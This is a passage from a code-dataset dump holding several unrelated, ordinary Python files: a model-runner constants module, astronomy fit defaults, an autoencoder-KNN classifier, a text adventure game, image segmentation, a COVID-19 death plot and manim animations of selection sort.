range(1, 16)]\n assert has_minimum_length(min_length, ranges_list)\n\n\ndef test_has_minimum_length_false():\n min_length = 14\n ranges_list = [range(9, 13), range(8, 12), range(1, 12)]\n assert not has_minimum_length(min_length, ranges_list)\n\n\ndef test_has_maximum_length():\n max_length = 8\n ranges_list = [range(8, 15), range(8, 16), range(1, 18)]\n assert has_maximum_length(max_length, ranges_list)\n\n\ndef test_has_maximum_length_false():\n max_length = 8\n ranges_list = [range(9, 13), range(8, 16), range(1, 18)]\n assert not has_maximum_length(max_length, ranges_list)\n","sub_path":"tests/test_structures.py","file_name":"test_structures.py","file_ext":"py","file_size_in_byte":13325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304847659","text":"import logging\nimport os\nimport sys\n\nfrom contextlib import contextmanager\nfrom enum import Enum\nfrom strictyaml import Bool, Int, Map, Optional, Str, load, YAMLError, Seq\nfrom pathlib import Path\n\nDEBUG = os.environ.get(\"DEBUG\")\n\nLOGGER_NAME_PREFIX = \"drum\"\nREGRESSION_PRED_COLUMN = \"Predictions\"\nCUSTOM_FILE_NAME = \"custom\"\nPOSITIVE_CLASS_LABEL_ARG_KEYWORD = \"positive_class_label\"\nNEGATIVE_CLASS_LABEL_ARG_KEYWORD = \"negative_class_label\"\nCLASS_LABELS_ARG_KEYWORD = \"class_labels\"\nTARGET_TYPE_ARG_KEYWORD = \"target_type\"\nRESPONSE_PREDICTIONS_KEY = \"predictions\"\nX_TRANSFORM_KEY = \"X.transformed\"\nY_TRANSFORM_KEY = \"y.transformed\"\n\nURL_PREFIX_ENV_VAR_NAME = \"URL_PREFIX\"\n\nMODEL_CONFIG_FILENAME = \"model-metadata.yaml\"\n\nPERF_TEST_SERVER_LABEL = \"__DRUM_PERF_TEST_SERVER__\"\n\nLOG_LEVELS = {\n \"noset\": logging.NOTSET,\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warn\": logging.WARN,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.CRITICAL,\n}\n\n\nclass SupportedFrameworks:\n SKLEARN = \"scikit-learn\"\n TORCH = \"torch\"\n KERAS = \"keras\"\n XGBOOST = \"xgboost\"\n PYPMML = \"pypmml\"\n\n\nextra_deps = {\n SupportedFrameworks.SKLEARN: [\"scikit-learn\", \"scipy\", \"numpy\"],\n SupportedFrameworks.TORCH: [\"torch\", \"numpy\", \"scikit-learn\", \"scipy\"],\n SupportedFrameworks.KERAS: [\"scipy\", \"numpy\", \"h5py\", \"tensorflow>=2.2.1\"],\n SupportedFrameworks.XGBOOST: [\"scipy\", \"numpy\", \"xgboost\"],\n SupportedFrameworks.PYPMML: [\"pypmml\"],\n}\n\n\nclass CustomHooks:\n INIT = \"init\"\n READ_INPUT_DATA = \"read_input_data\"\n LOAD_MODEL = \"load_model\"\n TRANSFORM = \"transform\"\n SCORE = \"score\"\n SCORE_UNSTRUCTURED = \"score_unstructured\"\n POST_PROCESS = \"post_process\"\n FIT = \"fit\"\n\n ALL_PREDICT_STRUCTURED = [INIT, READ_INPUT_DATA, LOAD_MODEL, TRANSFORM, SCORE, POST_PROCESS]\n ALL_PREDICT_UNSTRUCTURED = [INIT, LOAD_MODEL, SCORE_UNSTRUCTURED]\n ALL_PREDICT_FIT_STRUCTURED = ALL_PREDICT_STRUCTURED + [FIT]\n\n\nclass UnstructuredDtoKeys:\n DATA = \"data\"\n QUERY = \"query\"\n MIMETYPE = \"mimetype\"\n CHARSET = \"charset\"\n\n\nclass StructuredDtoKeys:\n BINARY_DATA = \"binary_data\"\n MIMETYPE = \"mimetype\"\n TARGET_BINARY_DATA = \"target_binary_data\"\n TARGET_MIMETYPE = \"target_mimetype\"\n\n\nclass PredictionServerMimetypes:\n APPLICATION_JSON = \"application/json\"\n APPLICATION_OCTET_STREAM = \"application/octet-stream\"\n TEXT_PLAIN = \"text/plain\"\n APPLICATION_X_APACHE_ARROW_STREAM = \"application/x-apache-arrow-stream\"\n TEXT_MTX = \"text/mtx\"\n TEXT_CSV = \"text/csv\"\n EMPTY = \"\"\n\n\nclass InputFormatExtension:\n MTX = \".mtx\"\n ARROW = 
\".arrow\"\n\n\nInputFormatToMimetype = {\n InputFormatExtension.MTX: PredictionServerMimetypes.TEXT_MTX,\n InputFormatExtension.ARROW: PredictionServerMimetypes.APPLICATION_X_APACHE_ARROW_STREAM,\n}\n\n\nclass PythonArtifacts:\n PKL_EXTENSION = \".pkl\"\n TORCH_EXTENSION = \".pth\"\n KERAS_EXTENSION = \".h5\"\n JOBLIB_EXTENSION = \".joblib\"\n PYPMML_EXTENSION = \".pmml\"\n ALL = [PKL_EXTENSION, TORCH_EXTENSION, KERAS_EXTENSION, JOBLIB_EXTENSION, PYPMML_EXTENSION]\n\n\nclass RArtifacts:\n RDS_EXTENSION = \".rds\"\n ALL = [RDS_EXTENSION]\n\n\nclass JavaArtifacts:\n JAR_EXTENSION = \".jar\"\n MOJO_EXTENSION = \".zip\"\n POJO_EXTENSION = \".java\"\n MOJO_PIPELINE_EXTENSION = \".mojo\"\n ALL = [JAR_EXTENSION, MOJO_EXTENSION, POJO_EXTENSION, MOJO_PIPELINE_EXTENSION]\n\n\nclass ArgumentsOptions:\n ADDRESS = \"--address\"\n DIR = \"--dir\"\n DOCKER = \"--docker\"\n MEMORY = \"--memory\"\n INPUT = \"--input\"\n OUTPUT = \"--output\"\n TARGET = \"--target\"\n TARGET_CSV = \"--target-csv\"\n CODE_DIR = \"--code-dir\"\n NEGATIVE_CLASS_LABEL = \"--negative-class-label\"\n POSITIVE_CLASS_LABEL = \"--positive-class-label\"\n WEIGHTS_CSV = \"--row-weights-csv\"\n WEIGHTS = \"--row-weights\"\n SKIP_PREDICT = \"--skip-predict\"\n TIMEOUT = \"--timeout\"\n PRODUCTION = \"--production\"\n LOGGING_LEVEL = \"--logging-level\"\n LANGUAGE = \"--language\"\n NUM_ROWS = \"--num-rows\"\n MONITOR = \"--monitor\"\n DEPLOYMENT_ID = \"--deployment-id\"\n MODEL_ID = \"--model-id\"\n MONITOR_SETTINGS = \"--monitor-settings\"\n QUERY = \"--query\"\n CONTENT_TYPE = \"--content-type\"\n WITH_ERROR_SERVER = \"--with-error-server\"\n SHOW_STACKTRACE = \"--show-stacktrace\"\n MAX_WORKERS = \"--max-workers\"\n VERBOSE = \"--verbose\"\n VERSION = \"--version\"\n TARGET_TYPE = \"--target-type\"\n CLASS_LABELS = \"--class-labels\"\n CLASS_LABELS_FILE = \"--class-labels-file\"\n\n MAIN_COMMAND = \"drum\" if not DEBUG else \"./custom_model_runner/bin/drum\"\n\n SCORE = \"score\"\n SERVER = \"server\"\n FIT = \"fit\"\n PERF_TEST = \"perf-test\"\n NEW = \"new\"\n NEW_MODEL = \"model\"\n NEW_ENV = \"env\"\n VALIDATION = \"validation\"\n PUSH = \"push\"\n\n\nclass ArgumentOptionsEnvVars:\n TARGET_TYPE = \"TARGET_TYPE\"\n CODE_DIR = \"CODE_DIR\"\n NEGATIVE_CLASS_LABEL = \"NEGATIVE_CLASS_LABEL\"\n POSITIVE_CLASS_LABEL = \"POSITIVE_CLASS_LABEL\"\n CLASS_LABELS_FILE = \"CLASS_LABELS_FILE\"\n CLASS_LABELS = \"CLASS_LABELS\"\n ADDRESS = \"ADDRESS\"\n MAX_WORKERS = \"MAX_WORKERS\"\n\n MONITOR = \"MONITOR\"\n WITH_ERROR_SERVER = \"WITH_ERROR_SERVER\"\n SHOW_STACKTRACE = \"SHOW_STACKTRACE\"\n PRODUCTION = \"PRODUCTION\"\n\n VALUE_VARS = [\n TARGET_TYPE,\n CODE_DIR,\n NEGATIVE_CLASS_LABEL,\n POSITIVE_CLASS_LABEL,\n CLASS_LABELS_FILE,\n CLASS_LABELS,\n ADDRESS,\n MAX_WORKERS,\n ]\n BOOL_VARS = [WITH_ERROR_SERVER, SHOW_STACKTRACE, PRODUCTION, MONITOR]\n\n\nclass RunMode(Enum):\n SCORE = ArgumentsOptions.SCORE\n SERVER = ArgumentsOptions.SERVER\n PERF_TEST = ArgumentsOptions.PERF_TEST\n VALIDATION = ArgumentsOptions.VALIDATION\n FIT = ArgumentsOptions.FIT\n NEW = ArgumentsOptions.NEW\n PUSH = ArgumentsOptions.PUSH\n NEW_MODEL = \"new_model\"\n\n\nclass RunLanguage(Enum):\n PYTHON = \"python\"\n R = \"r\"\n JAVA = \"java\"\n\n\nclass TargetType(Enum):\n BINARY = \"binary\"\n REGRESSION = \"regression\"\n ANOMALY = \"anomaly\"\n UNSTRUCTURED = \"unstructured\"\n MULTICLASS = \"multiclass\"\n TRANSFORM = \"transform\"\n CLASSIFICATION = [BINARY, MULTICLASS]\n ALL = [BINARY, MULTICLASS, REGRESSION, ANOMALY, UNSTRUCTURED, TRANSFORM]\n\n\nclass 
TemplateType:\n MODEL = \"model\"\n ENV = \"environment\"\n\n\nclass EnvVarNames:\n DRUM_JAVA_XMX = \"DRUM_JAVA_XMX\"\n\n\n@contextmanager\ndef reroute_stdout_to_stderr():\n keep = sys.stdout\n sys.stdout = sys.stderr\n try:\n yield\n finally:\n sys.stdout = keep\n\n\n@contextmanager\ndef verbose_stdout(verbose):\n new_target = sys.stdout\n old_target = sys.stdout\n if not verbose:\n new_target = open(os.devnull, \"w\")\n sys.stdout = new_target\n try:\n yield new_target\n finally:\n sys.stdout = old_target\n\n\ndef config_logging():\n logging.basicConfig(format=\"%(asctime)-15s %(levelname)s %(name)s: %(message)s\")\n\n\nMODEL_CONFIG_SCHEMA = Map(\n {\n \"name\": Str(),\n \"type\": Str(),\n \"environmentID\": Str(),\n \"targetType\": Str(),\n \"validation\": Map({\"input\": Str(), Optional(\"targetName\"): Str()}),\n Optional(\"modelID\"): Str(),\n Optional(\"description\"): Str(),\n Optional(\"majorVersion\"): Bool(),\n Optional(\"inferenceModel\"): Map(\n {\n \"targetName\": Str(),\n Optional(\"positiveClassLabel\"): Str(),\n Optional(\"negativeClassLabel\"): Str(),\n Optional(\"classLabels\"): Seq(Str()),\n Optional(\"classLabelsFile\"): Str(),\n Optional(\"predictionThreshold\"): Int(),\n }\n ),\n Optional(\"trainingModel\"): Map({Optional(\"trainOnProject\"): Str()}),\n }\n)\n\n\ndef read_model_metadata_yaml(code_dir):\n code_dir = Path(code_dir)\n config_path = code_dir.joinpath(MODEL_CONFIG_FILENAME)\n if config_path.exists():\n with open(config_path) as f:\n try:\n model_config = load(f.read(), MODEL_CONFIG_SCHEMA).data\n except YAMLError as e:\n print(e)\n raise SystemExit(1)\n return model_config\n return None\n\n\nclass PayloadFormat:\n CSV = \"csv\"\n ARROW = \"arrow\"\n MTX = \"mtx\"\n\n\nclass SupportedPayloadFormats:\n def __init__(self):\n self._formats = {}\n self._mimetype_to_payload_format = {\n None: PayloadFormat.CSV,\n PredictionServerMimetypes.EMPTY: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_CSV: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_PLAIN: PayloadFormat.CSV,\n PredictionServerMimetypes.TEXT_MTX: PayloadFormat.MTX,\n PredictionServerMimetypes.APPLICATION_X_APACHE_ARROW_STREAM: PayloadFormat.ARROW,\n }\n\n def add(self, payload_format, format_version=None):\n self._formats[payload_format] = format_version\n\n def is_mimetype_supported(self, mimetype):\n payload_format = self._mimetype_to_payload_format.get(mimetype)\n if payload_format is None:\n return False\n\n return payload_format in self._formats\n\n def __iter__(self):\n for payload_format, format_version in self._formats.items():\n yield payload_format, format_version\n\n\ndef make_predictor_capabilities(supported_payload_formats):\n return {\n \"supported_payload_formats\": {\n payload_format: format_version\n for payload_format, format_version in supported_payload_formats\n }\n }\n\n\ntry:\n import pyarrow\nexcept ImportError:\n pyarrow = None\n\n\ndef get_pyarrow_module():\n return pyarrow\n\n\ndef verify_pyarrow_module():\n if pyarrow is None:\n raise ModuleNotFoundError(\"Please install pyarrow to support Arrow format\")\n return pyarrow\n","sub_path":"custom_model_runner/datarobot_drum/drum/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477379791","text":"\"\"\"\nDefault parameters in Chronostar\n\nTHIS SHOULD GO TO CONFIG\n\"\"\"\n\npars = {\n 'component': 'sphere',\n 'filename_init_comps': None,\n 'filename_init_memb_probs': None,\n 
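# EM iteration limits and the lnprob window used to judge convergence\n 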
'max_em_iterations': 100,\n 'min_em_iterations': 30,\n 'lnlike_convergence_slice_size': 10, # This should be at most 'min_em_iterations'/3 or smaller\n \n \n # INPUT\n 'data_table': None,\n \n # Column name for stellar IDs. This is used at the end when generating\n # final fits table with IDs and membership probabilities.\n # This is optional.\n 'stellar_id_colname': None,\n\n\n # File name that points to a stored list of components, typically from\n # a previous fit. Some example filenames could be:\n # - 'some/prev/fit/final_comps.npy\n # - 'some/prev/fit/2/A/final_comps.npy\n # Alternatively, if you already have the list of components, just\n # provide them to `init_comps`. Don't do both.\n # 'init_comps_file':None, # TODO: Is this redundant with 'init_comps'\n 'init_comps': None,\n\n # One of these two is required if initialising a run with ncomps != 1\n\n # One can also initialise a Chronostar run with memberships.\n # Array is [nstars, ncomps] float array\n # Each row should sum to 1.\n # Same as in 'final_membership.npy'\n # TODO: implement this in a way that info can be passed in from text file\n # e.g. a path to a file name\n # for now, can only be used from within a script, i.e. given a numpy\n # array object\n 'init_memb_probs': None, \n\n\n # Model\n 'max_comp_count': 20,\n\n # It turns out that in scipy.optimize.maximize tol=1 is optimal...\n 'optimisation_method': 'Nelder-Mead',\n 'convergence_tol': 1,\n \n # TODO: organise this together with min_em_iterations, lnlike_convergence_slice_size\n # EM convergence criterion: when the median values of lnprob slices change less than X (fraction)\n 'EM_convergence_requirement': 0.03, # fraction of maximal lnprob change\n\n\n # How to split group: in age or in space?\n 'split_group_method': 'age',\n 'split_label': '',\n\n\n 'trace_orbit_func': 'epicyclic',\n\n # Convergence criteria for when a fit_many_comps run has converged\n 'bic_conv_tol':0.1, # TODO: NOT TESTED!\n 'use_background':True,\n 'use_box_background':False,\n \n \n # TODO: DELETE THIS!!!\n 'historical_colnames': False,\n\n\n # OUTPUT\n 'overwrite_prev_run': False,\n 'folder_destination': 'result',\n\n # For every component of each iteration\n 'filename_best_comp_fit': 'best_comp_fit.npy',\n \n # Each iteration\n 'filename_iter_memberships': 'membership.npy',\n 'filename_iter_comps': 'best_comps.npy',\n 'filename_iter_lnprob_and_bic': 'lnprob_bic.npy',\n 'filename_lnprob_convergence': 'lnprob_convergence.png',\n\n 'filename_ABC_all_bics': 'all_bics.npy',\n 'filename_ABC_all_bics_figure': 'all_bics.pdf',\n 'filename_figure_bics': 'bics.pdf',\n\n 'filename_bics_list': 'bic_list.npy',\n 'filename_lihelihood_and_bic': 'likelihood_post_and_bic.npy',\n\n # Results\n 'filename_final_memberships': 'final_memberships.npy',\n 'filename_final_components': 'final_comps.npy',\n 'filename_final_lnprob_and_bic': 'final_lnprob_and_bic.npy',\n \n \n 'par_log_file': 'fit_pars.log',\n 'folder_tmp': 'tmp',\n 'filename_log': 'log.log',\n\n\n}\n\n","sub_path":"chronostar/default_pars.py","file_name":"default_pars.py","file_ext":"py","file_size_in_byte":3433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"322058341","text":"from keras.initializers import RandomNormal\nfrom keras.engine.topology import Layer, InputSpec\nfrom keras.models import Model, Sequential\nfrom keras.layers import Dense, Dropout, Input\nfrom keras.optimizers import 
SGD\nfrom SKNN import Semi_Supervised_KNN\nimport numpy as np\n\nclass DAEKNN:\n \n def __init__(self, dim, entrada, k):\n self.k = k\n self.entrada = entrada\n self.dim = dim\n \n input_img = Input((self.entrada,))\n #encoded = Dense(50, activation='relu')(input_img)\n #drop = Dropout(0.2)(encoded)\n encoded = Dense(10, activation='relu')(input_img)\n #drop = Dropout(0.2)(encoded)\n #encoded = Dense(100, activation='relu')(drop)\n \n Z = Dense(self.dim, activation='relu')(encoded)\n \n decoded = Dense(10, activation='relu')(Z)\n #drop = Dropout(0.2)(decoded)\n #decoded = Dense(50, activation='relu')(drop)\n #drop = Dropout(0.2)(decoded)\n #decoded = Dense(250, activation='relu')(drop)\n decoded = Dense(self.entrada, activation='sigmoid')(decoded)\n \n self.encoder = Model(input_img, Z)\n self.autoencoder = Model(input_img, decoded)\n #self.autoencoder.summary()\n self.autoencoder.compile(loss='mse', optimizer=SGD(lr=0.1, decay=0, momentum=0.9))\n \n def fit(self,L, U, y):\n PU = self.reducaoZ(U) \n PL = self.encoder.predict(L)\n return self.rotulacao(PL, PU, y)\n \n def reducaoZ(self, X):\n self.autoencoder.fit(X, X, batch_size=30, epochs=50, verbose=False)\n return self.encoder.predict(X)\n \n def rotulacao(self, PL, PU, y):\n self.knn = Semi_Supervised_KNN()\n #print('........... Tamanho Rotulados: ', str(np.size(PL, axis=1)))\n self.rotulos = self.knn.classificar(PL, PU, y, k=self.k)\n return self.rotulos\n \n def predizer(self, L, U, y):\n PL = self.encoder.predict(L)\n PU = self.encoder.predict(U)\n return self.knn.classificar(PL, PU, y, k = self.k)\n ","sub_path":"DAE_KNN.py","file_name":"DAE_KNN.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"577792988","text":"# main.py\n# Midnight Rider\n# a text adventure game that is riveting.\n# IGN gives it 4 stars out of 100\n\nimport random\nimport sys\nimport textwrap\nimport time\n\nINTRODUCTION = \"\"\"\nWELCOME TO MIDNIGHT RIDER\n\nWE'VE STOLEN A CAR. WE NEED TO GET IT HOME. \nTHE CAR IS SPECIAL\n\nTHE GOVERNMENT WANTS IT FOR THEIR GAIN\n\nWE CAN'T LET THAT HAPPEN \n\nONE GOAL: SURVIVAL... AND THE CAR.\nREACH THE END BEFORE THE MAN GON GETCHU\n\n\"\"\"\n\nWIN = \"\"\" \n\nYou pressed the button to open the gate. \nThis isn't the first time you've done this, so you know how to time it exactly.\nJust as the doors close, you slide right into HQ.\nYou know you did the right thing; the government would have just torn the car apart.\nThey don't know its secrets...\nthat it holds the key to different worlds.\nAs you step out of the vehicle, Fido runs up to you.\n\"Thank you for saving me,\" he says. \nAs you take a couple of steps away, the car makes a strange sound.\nIt changes its shape.\nYou've seen it before, but only on TV.\n\"...Bumblebee?\"\n\"\"\"\n\nLOSE_HUNGER = \"\"\"\nYOUR STOMACH IS EMPTY.\nWHO KNEW THAT WHAT THE DOCTOR SAID WAS TRUE. \nTHAT HUMAN/ROBOT HYBRIDS WOULD NEED TOFU TO SUSTAIN THEMSELVES.\nYOUR ROBOT SYSTEMS START TO SHUT DOWN\nYOUR HUMAN EYES CLOSE\nTHE LAST THING THAT YOU HEAR IS SIRENS.\nTHEY GOTCHU. THEY GOT THE CAR\nWE FAILED... \n------ GAME OVER ------\n\"\"\"\n\nLOSE_AGENTS = \"\"\"\nTHE AGENTS CAUGHT UP TO YOU.\nTHEY GOTCHU. THEY GOT THE CAR\nWE FAILED... \n------ GAME OVER ------\n\"\"\"\n\n\nCHOICES = \"\"\"\n-----\nA. Eat some tofu\nB. Continue ahead at a moderate speed\nC. Speed ahead at full throttle\nD. Stop for fuel at refuelling station. (No food available)\nE. Status check\nQ. 
Quit\n-----\n\"\"\"\n\ndef type_text_output(text):\n for char in textwrap.dedent(text):\n time.sleep(0.05)\n sys.stdout.write(char)\n sys.stdout.flush()\n\n time.sleep(1)\n\ndef main():\n type_text_output(INTRODUCTION)\n\n # CONSTANTS\n MAX_FUEL_LEVEL = 50\n MAX_TOFU_LEVEL = 3\n MAX_DISTANCE_TRAVELED = 100\n TOFU_CHANCE = 0.03\n\n # Variables\n done = False\n\n km_traveled = 0\n agents_distance = -20.0\n turns = 0\n tofu = MAX_TOFU_LEVEL\n fuel = MAX_FUEL_LEVEL\n hunger = 0\n\n while not done:\n # TODO: Random events\n # Fido\n if random.random() < TOFU_CHANCE:\n # Fido pops up says something and refills tofu\n tofu = MAX_TOFU_LEVEL\n print()\n print(\"****** Your tofu is magically refilled!\")\n print(\"******\\\"you're welcome!\\\" a voice says.\")\n print(\"****** It's Fido.\")\n print(\"****** He's using his tofu cooking skillz.\")\n\n # Check if reached END GAME\n if km_traveled > MAX_DISTANCE_TRAVELED:\n # WIN\n # Print out win scenario (typing way)\n time.sleep(2)\n type_text_output(WIN)\n break\n\n elif hunger > 45:\n # Lose - too hungry\n # print losing hunger scenario\n time.sleep(2)\n type_text_output(LOSE_HUNGER)\n break\n\n elif agents_distance >= 0:\n # LOSE - AGENTS REACHED YOU\n # print losing agents scenario\n time.sleep(2)\n type_text_output(LOSE_AGENTS)\n break\n\n elif fuel <= 0:\n #LOSE - RAN OUT OF FUEL\n # TODO: PRINT LOSE SCENARIO - FUEL\n break\n\n #Showing hunger\n if hunger > 35:\n print(\"***** Your stomach rumbles. You need to eat something soon.\")\n elif hunger > 20:\n print(\"***** Your hunger is small but manageable.\")\n\n\n\n # Give the player their choices\n print(CHOICES)\n\n # Handle user's input\n users_choice = input(\"What do you want to do?\").lower().strip(\"!,.?\")\n\n if users_choice == \"a\":\n # eat\n if tofu > 0:\n tofu -= 1\n hunger = 0\n print()\n print(\"-------- MMMMMMmmmm. 
Soybean goodness\")\n print(\"--------- Your hunger is sated.\")\n print()\n\n else:\n print()\n print(\"------- You have none left\")\n print()\n\n elif users_choice == \"b\":\n # drive slow\n player_distance_now = random.randrange(7, 15)\n agents_distance_now = random.randrange(7, 15)\n\n # burn fuel\n fuel -= random.randrange(2, 7)\n\n # Player distance traveled\n km_traveled += player_distance_now\n\n # Agent's distance traveled\n agents_distance -= (player_distance_now - agents_distance_now)\n\n # Feedback to player\n print()\n print(f\"-------- You traveled {player_distance_now} kms!\")\n print()\n\n elif users_choice == \"c\":\n # drive fast\n player_distance_now = random.randrange(10, 16)\n agents_distance_now = random.randrange(7 ,15)\n\n # Burn fuel\n fuel -= random.randrange(5, 11)\n\n # player distance traveled\n km_traveled += player_distance_now\n\n # agents distance traveled\n agents_distance -= (player_distance_now - agents_distance_now)\n\n # feedback to player\n print()\n print(f\"-------- you sped ahead {player_distance_now} kms!\")\n print()\n\n elif users_choice == \"d\":\n # refuel\n # fill the fuel tank\n fuel = MAX_FUEL_LEVEL\n\n # consider the agents coming close\n agents_distance += random.randrange(7, 15)\n\n # give the user feedback\n print()\n print(\"--------- You filled the fuel tank\")\n print(\"-------- The agents got closer...\")\n print()\n\n elif users_choice == \"e\":\n print(f\"\\t---Status Check---\")\n print(f\"\\tkms traveled: {km_traveled} kms\")\n print(f\"\\tFuel left: {fuel} L\")\n print(f\"\\tAgents are {abs(agents_distance)} kms\")\n print(f\"\\tYou have {tofu} tofu left\")\n print(\"\\t------\\n\")\n\n elif users_choice == \"q\":\n done = True\n\n # Increase hunger\n if users_choice not in [\"a\", \"e\"]:\n hunger += random.randrange(5, 13)\n turns += 1\n\n # Pause\n time.sleep(1.2)\n\n # Outroduction\n print(\"Thanks for playing! 
Please play again :) \")\n print(f\"You finished the game in {turns} turns.\")\n\nif __name__ == '__main__':\n main()","sub_path":"main.py2.py","file_name":"main.py2.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"291120080","text":"#!/usr/bin/env python3\nimport sys, numpy\nfrom scipy import misc\n\nlabels = ['sea', 'lake', 'vegetation', 'builtup']\nsamples = [3, 1, 4, 1]\ncolors = [0, 75, 128, 255]\nmeans = numpy.zeros(shape=(4, 3))\n\nfor i in range(len(labels)):\n sumation = numpy.zeros(shape=(3,))\n count = 0\n images = map(lambda x: labels[i]+x+'.png', [''] if samples[i] == 1 else map(str, range(1, 1+samples[i])))\n for image in images:\n data = misc.imread(image)\n sumation += numpy.sum(data, axis=(0, 1))\n count += data.shape[0]*data.shape[1]\n means[i] = sumation/count\nmeans = numpy.array(means)\n\nif len(sys.argv) < 2 or sys.argv[1] not in ['eu', 'man']:\n print('Unknown option')\nelse:\n data = misc.imread('mumbai.png')\n if sys.argv[1] == 'eu':\n data = numpy.array([numpy.linalg.norm(data-mean, axis=(2,)) for mean in means])\n else:\n data = numpy.array([numpy.sum(numpy.abs(data-mean), axis=(2,)) for mean in means])\n data = numpy.argmin(data, axis=0)\n data = numpy.vectorize(lambda x: colors[x])(data)\n misc.imsave('segmented_'+sys.argv[1]+'.png', data)\n","sub_path":"170050034-170050094-170050096-outlab11/P1/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"460722173","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\ndf = pd.read_csv(\"datasets/covid_19_data_tr.csv\") \r\n\r\nfirst_wave = df['Deaths'].iloc[:32]\r\nsecond_wave = df['Deaths'].iloc[32:63]\r\nthird_wave = df['Deaths'].iloc[63:95]\r\nfourth_wave = df['Deaths'].iloc[95:126]\r\nfig,axs = plt.subplots(2,2)\r\n\r\nyil1 = df['Last_Update'].iloc[:32]\r\nyil2 = df['Last_Update'].iloc[32:63]\r\nyil3 = df['Last_Update'].iloc[63:95]\r\nyil4 = df['Last_Update'].iloc[95:126]\r\n\r\naxs[0,0].grid() # adds a grid to the subplot\r\naxs[0,1].grid()\r\naxs[1,0].grid() \r\naxs[1,1].grid()\r\naxs[0,0].set_title(\"İLK AY\") # set the title of the 1st subplot\r\naxs[0,1].set_title(\"İKİNCİ AY\") # set the title of the 2nd subplot\r\naxs[1,0].set_title(\"ÜÇÜNCÜ AY\") # set the title of the 3rd subplot\r\naxs[1,1].set_title(\"DÖRDÜNCÜ AY\") # set the title of the 4th subplot\r\naxs[0,0].plot(yil1,first_wave, 'o--r')\r\naxs[0,0].set_xticklabels(yil1, rotation=70) # rotates the tick labels by 70 degrees\r\n\r\naxs[0,1].plot(yil2,second_wave, 'o--r')\r\naxs[0,1].set_xticklabels(yil2, rotation=70)\r\n\r\naxs[1,0].plot(yil3,third_wave, 'o--r')\r\naxs[1,0].set_xticklabels(yil3, rotation=70)\r\n\r\naxs[1,1].plot(yil4,fourth_wave, 'o--r')\r\naxs[1,1].set_xticklabels(yil4, rotation=70)\r\nplt.tight_layout()\r\nfig.suptitle(\"COVID-19 DEATHS IN TURKEY\")\r\nplt.savefig('datasets/covid.pdf') # saves the figure as a PDF\r\nplt.legend() # shows the legend\r\nplt.show() # opens the figure window\r\n\r\n\r\n","sub_path":"deaths_of_covid_table.py","file_name":"deaths_of_covid_table.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"245539204","text":"from manimlib.imports import *\nfrom vivek.vid_0003_selection_sort.code import Code\n\nclass Opening(Scene):\n def construct(self):\n text = TextMobject(\"Computer Science by Pandey\")\n\n subtext = TextMobject(\"One video: One snack sized topic\")\n topic = TextMobject(\"SELECTION SORT\")\n topic.set_color(BLUE)\n VGroup(text, subtext, topic).arrange(DOWN)\n self.play(FadeIn(text), FadeIn(subtext))\n self.wait(15)\n self.play(FadeOut(text), FadeOut(subtext))\n\nclass Topic(Scene):\n def swap(self, later, former, run_time=1):\n multiple = 0.8\n delta = 0\n later_stick = self.array1[self.seq[later]]\n former_stick = self.array1[self.seq[former]]\n\n self.play(ApplyMethod(self.array1[self.seq[later]].set_color, RED))\n\n later_stick.generate_target()\n later_stick.target.next_to(later_stick, 2 * UP)\n former_stick.generate_target()\n former_stick.target.next_to(former_stick, 2 * DOWN)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n\n shift = (later - former) * multiple + delta\n\n later_stick.generate_target()\n later_stick.target.shift(shift * LEFT)\n former_stick.generate_target()\n former_stick.target.shift(shift * RIGHT)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n\n later_stick.generate_target()\n later_stick.target.next_to(later_stick, 2 * DOWN)\n former_stick.generate_target()\n former_stick.target.next_to(former_stick, 2 * UP)\n self.play(MoveToTarget(later_stick), MoveToTarget(former_stick), run_time=run_time)\n \n self.seq[later], self.seq[former] = self.seq[former], self.seq[later]\n \n def construct(self):\n topic = TextMobject(\"SELECTION SORT\")\n topic.scale(2)\n topic.set_color(BLUE)\n self.play(Write(topic))\n\n self.num_elems1 = 7\n self.nums1 = [23, 25, 19, 28, 14, 17, 20]\n self.seq = [0, 1, 2, 3, 4, 5, 6]\n side_length = 0.8\n self.squares1 = [Square(side_length=side_length) for i in range(self.num_elems1)]\n self.boxes1 = VGroup(*self.squares1).arrange(RIGHT, buff=0).to_edge(TOP, buff=SMALL_BUFF)\n\n g = VGroup(self.boxes1).arrange(RIGHT).next_to(topic, DOWN, buff=10 * SMALL_BUFF)\n\n num_mobjects1 = [TextMobject(\"$a_\" + str(i) + \"$\") for i in range(self.num_elems1)]\n self.array1 = VGroup(*num_mobjects1).arrange(RIGHT, buff=3.8*SMALL_BUFF)\n self.array1.next_to(self.boxes1[0], RIGHT, buff=-6*SMALL_BUFF)\n self.play(FadeIn(self.array1), FadeIn(g))\n self.swap(4, 0)\n self.swap(6, 1)\n self.swap(3, 2)\n self.swap(5, 3)\n self.wait(15)\n\nclass Tree(VGroup):\n class MyEllipse(Ellipse):\n def __init__(self, **kwargs):\n CONFIG = {\n \"stroke_width\": 3\n }\n super().__init__(**CONFIG)\n\n def 
